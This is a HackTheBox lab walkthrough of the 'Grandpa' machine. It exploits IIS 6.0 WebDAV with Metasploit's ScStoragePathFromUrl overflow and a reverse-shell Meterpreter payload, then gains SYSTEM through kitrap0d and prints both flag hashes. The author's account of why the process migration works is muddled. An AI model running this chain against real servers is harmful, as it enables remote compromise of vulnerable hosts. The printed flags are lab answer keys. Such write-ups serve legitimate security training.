A quick walkthrough of the VM named "Grandpa" on HackTheBox.
A quick NMAP scan..
http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0So, we have IIS 6.0, and Webdav running. Let's ask searchsploit
$ searchsploit iis webdav
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Run it through Google,
https://www.exploit-db.com/exploits/41738
https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-63/version_id-13444/Microsoft-Internet-Information-Server-6.0.html
And finally, let's ask metasploit, so fire up metasploit console, and let's run a search for iis webdav.
msf6 > search webdav iis
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
1 exploit/windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow
2 auxiliary/scanner/http/dir_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
3 auxiliary/scanner/http/ms09_020_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Authentication Bypass
4 exploit/windows/iis/iis_webdav_upload_asp 2004-12-31 excellent No Microsoft IIS WebDAV Write Access Code Execution
5 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
msf6 >
So. we have it in a lot of places, for no reason other than laziness, let's go with MSF.
msf > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf > show options
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.13 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen portHere we have a meterpreter_reverse_tcp payload, and a webdav exploit configured, so set lhost, rhosts and run it, and you should get a meterpreter reverse shell back. No, we need to elevate to something usefull using a local exploit, so exploit-suggester to the rescue.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.129.139.10 - Collecting local exploits for x86/windows...
[*] 10.129.139.10 - 37 exploit checks are being tried...
[+] 10.129.139.10 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.139.10 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.139.10 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.139.10 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.139.10 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.139.10 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > Now, if you try these, you will see they fail, because we have't gotten the rights to run them, so how do we fix that. We need to migrate into a process that got system rights and run them again. So let's try that. Head back to a meterpreter session, and let's get to work.
meterpreter > sysinfo
Computer : GRANPA
OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
268 4 smss.exe
324 268 csrss.exe
348 268 winlogon.exe
396 348 services.exe
408 348 lsass.exe
596 396 svchost.exe
680 396 svchost.exe
740 396 svchost.exe
776 396 svchost.exe
808 396 svchost.exe
1000 396 spoolsv.exe
1028 396 msdtc.exe
1104 396 cisvc.exe
1148 396 svchost.exe
1208 396 inetinfo.exe
1256 396 svchost.exe
1348 396 VGAuthService.exe
1412 396 vmtoolsd.exe
1484 396 svchost.exe
1672 396 svchost.exe
1808 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1856 396 dllhost.exe
1932 396 alg.exe
2268 348 logon.scr
2436 596 wmiprvse.exe
2596 2752 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
2752 1484 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2824 596 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
3200 2596 cmd.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\cmd.exe
3984 1104 cidaemon.exe
4028 1104 cidaemon.exe
4052 1104 cidaemon.exe
meterpreter > migrate 408
[*] Migrating from 2596 to 408...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
meterpreter > migrate 1808
[*] Migrating from 2596 to 1808...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > So, we listed the processes running, and found lsass.exe running, and tried to migrate into that, but that clearly didn't work. But there's another one with PID 1808, running as NT AUTHORITY\NETWORK SERVICE.
We tried that, and this time it did work. So, what now ?, background the session, and run kitrap0d, and see if we get system.
msf6 exploit(windows/local/ms16_016_webdav) > use exploit/windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > show options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.25 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.25:4444
[*] Launching notepad to host the exploit...
[+] Process 2516 launched.
[*] Reflectively injecting the exploit DLL into 2516...
[*] Injecting exploit into 2516 ...
[*] Exploit injected. Injecting payload into 2516...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.129.139.10
[*] Meterpreter session 2 opened (10.10.14.25:4444 -> 10.129.139.10:1033) at 2021-04-30 14:23:32 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
shell
And, it did, we got system. Let's grab some flags.
meterpreter > cat 'c:\Documents and Settings\Harry\Desktop\user.txt'
bdff5ec67c3cff017f2bedc146a5d869
meterpreter > cat 'c:\Documents and Settings\Administrator\Desktop\root.txt'
9359e905a2c35f861f6a57cecf28bb7bOkay, time for coffee and a snack, we got this ;)